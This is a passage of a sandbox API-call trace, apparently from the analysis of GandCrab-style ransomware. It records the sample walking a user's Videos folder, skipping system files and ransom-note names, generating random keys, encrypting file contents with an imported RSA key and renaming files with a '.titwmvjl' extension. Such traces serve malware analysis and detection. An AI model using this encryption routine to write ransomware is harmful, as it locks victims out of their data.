lpFindFileData=0x259ed68) returned 0x503938 [0095.946] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.946] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0095.947] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.947] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.947] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0095.947] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0095.947] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0095.947] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\d2ca4a09d2ca4deb61a.lock" [0095.947] lstrlenW (lpString=".titwmvjl") returned 9 [0095.947] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\d2ca4a09d2ca4deb61a.lock") returned 100 [0095.947] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.947] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 109 [0095.948] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\d2ca4a09d2ca4deb61a.lock") returned 100 [0095.948] lstrlenW (lpString=".lock") returned 5 [0095.948] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.948] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0095.948] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.948] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.948] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0095.948] lstrcmpW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2=".") returned 1 [0095.948] lstrcmpW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="..") returned 1 [0095.948] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\", lpString2="g3W5BQOIYhiNTGdOr8.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\g3W5BQOIYhiNTGdOr8.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\g3W5BQOIYhiNTGdOr8.swf" [0095.948] lstrlenW (lpString=".titwmvjl") returned 9 [0095.948] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\g3W5BQOIYhiNTGdOr8.swf") returned 98 [0095.948] VirtualAlloc (lpAddress=0x0, dwSize=0x104, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.949] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\g3W5BQOIYhiNTGdOr8.swf.titwmvjl") returned 107 [0095.949] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\g3W5BQOIYhiNTGdOr8.swf") returned 98 [0095.949] lstrlenW (lpString=".swf") returned 4 [0095.949] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.949] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".swf ") returned 5 [0095.949] lstrcmpiW (lpString1=".swf", lpString2=".titwmvjl") returned -1 [0095.949] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.949] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\g3W5BQOIYhiNTGdOr8.swf") returned 98 [0095.949] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\g3W5BQOIYhiNTGdOr8.swf") returned 98 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="desktop.ini") returned 1 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="autorun.inf") returned 1 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="ntuser.dat") returned -1 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="iconcache.db") returned -1 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="bootsect.bak") returned 1 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="boot.ini") returned 1 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="ntuser.dat.log") returned -1 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="thumbs.db") returned -1 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="KRAB-DECRYPT.html") returned -1 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="CRAB-DECRYPT.html") returned 1 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="ntldr") returned -1 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="NTDETECT.COM") returned -1 [0095.949] lstrcmpiW (lpString1="g3W5BQOIYhiNTGdOr8.swf", lpString2="Bootfont.bin") returned 1 [0095.949] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\g3W5BQOIYhiNTGdOr8.swf") returned 98 [0095.949] lstrlenW (lpString=".swf") returned 4 [0095.950] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.950] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".swf ") returned 5 [0095.950] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.950] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.950] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\g3W5BQOIYhiNTGdOr8.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\qjlg0ayf3eevs\\g3w5bqoiyhintgdor8.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0095.950] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.951] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0095.951] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.951] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.951] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0095.952] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.952] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.952] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.952] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0095.952] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.952] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.952] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.952] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.952] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0095.953] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.953] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.953] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.953] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0095.953] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.953] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.953] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.954] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.954] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0095.954] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.954] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503338) returned 1 [0095.954] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.954] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0095.954] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.954] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0095.955] GetLastError () returned 0x0 [0095.955] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.955] CryptDestroyKey (hKey=0x503338) returned 1 [0095.955] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.955] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.955] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.955] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0095.955] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.956] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503778) returned 1 [0095.956] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.956] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0095.956] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.956] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0095.956] GetLastError () returned 0x0 [0095.956] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.956] CryptDestroyKey (hKey=0x503778) returned 1 [0095.956] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.956] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.956] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.957] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.957] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x100fe, lpOverlapped=0x0) returned 1 [0095.968] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffeff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.968] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x100fe, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x100fe, lpOverlapped=0x0) returned 1 [0095.970] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.970] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0095.971] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.975] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.975] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.975] CloseHandle (hObject=0x2c4) returned 1 [0095.976] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\g3W5BQOIYhiNTGdOr8.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\qjlg0ayf3eevs\\g3w5bqoiyhintgdor8.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\g3W5BQOIYhiNTGdOr8.swf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\qjlg0ayf3eevs\\g3w5bqoiyhintgdor8.swf.titwmvjl"), dwFlags=0x1) returned 1 [0095.976] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.976] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0095.976] lstrcmpW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2=".") returned 1 [0095.977] lstrcmpW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="..") returned 1 [0095.977] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\", lpString2="rt_f3WaKPJuK49r_W.flv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\rt_f3WaKPJuK49r_W.flv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\rt_f3WaKPJuK49r_W.flv" [0095.977] lstrlenW (lpString=".titwmvjl") returned 9 [0095.977] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\rt_f3WaKPJuK49r_W.flv") returned 97 [0095.977] VirtualAlloc (lpAddress=0x0, dwSize=0x102, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.977] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\rt_f3WaKPJuK49r_W.flv.titwmvjl") returned 106 [0095.978] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\rt_f3WaKPJuK49r_W.flv") returned 97 [0095.978] lstrlenW (lpString=".flv") returned 4 [0095.978] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.979] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".flv ") returned 5 [0095.979] lstrcmpiW (lpString1=".flv", lpString2=".titwmvjl") returned -1 [0095.979] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.979] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\rt_f3WaKPJuK49r_W.flv") returned 97 [0095.979] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\rt_f3WaKPJuK49r_W.flv") returned 97 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="desktop.ini") returned 1 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="autorun.inf") returned 1 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="ntuser.dat") returned 1 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="iconcache.db") returned 1 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="bootsect.bak") returned 1 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="boot.ini") returned 1 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="ntuser.dat.log") returned 1 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="thumbs.db") returned -1 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="KRAB-DECRYPT.html") returned 1 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="CRAB-DECRYPT.html") returned 1 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="KRAB-DECRYPT.txt") returned 1 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="ntldr") returned 1 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="NTDETECT.COM") returned 1 [0095.979] lstrcmpiW (lpString1="rt_f3WaKPJuK49r_W.flv", lpString2="Bootfont.bin") returned 1 [0095.979] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\rt_f3WaKPJuK49r_W.flv") returned 97 [0095.979] lstrlenW (lpString=".flv") returned 4 [0095.979] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.980] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".flv ") returned 5 [0095.980] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.980] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.980] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\rt_f3WaKPJuK49r_W.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\qjlg0ayf3eevs\\rt_f3wakpjuk49r_w.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0095.980] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.981] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0095.981] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.981] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.981] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0095.982] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.982] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.982] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.982] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0095.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.982] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.982] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.983] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0095.983] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.983] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.983] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.983] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0095.983] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.983] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.983] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.984] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.984] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0095.984] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.984] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5038f8) returned 1 [0095.984] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.984] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0095.984] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.984] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0095.985] GetLastError () returned 0x0 [0095.985] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.985] CryptDestroyKey (hKey=0x5038f8) returned 1 [0095.985] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.985] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.985] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.985] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0095.985] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.986] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5038f8) returned 1 [0095.986] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.986] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0095.986] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.986] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0095.986] GetLastError () returned 0x0 [0095.986] LoadLibraryA 